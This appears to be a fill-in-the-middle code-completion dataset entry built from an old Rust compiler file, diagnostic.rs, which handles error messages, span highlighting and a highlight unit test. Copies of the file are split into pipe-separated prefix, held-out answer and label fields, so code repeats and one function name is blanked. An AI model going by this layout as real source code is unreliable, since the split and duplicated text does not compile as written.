let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
M: FnOnce() -> String,
{
match opt {
Some(t) => t,
None => diag.handler().bug(&msg()),
}
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> |
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
}
| { Ok(()) } | identifier_body |
diagnostic.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn | (dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len()));
}
Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
M: FnOnce() -> String,
{
match opt {
Some(t) => t,
None => diag.handler().bug(&msg()),
}
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
}
| print_diagnostic | identifier_name |
diagnostic.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
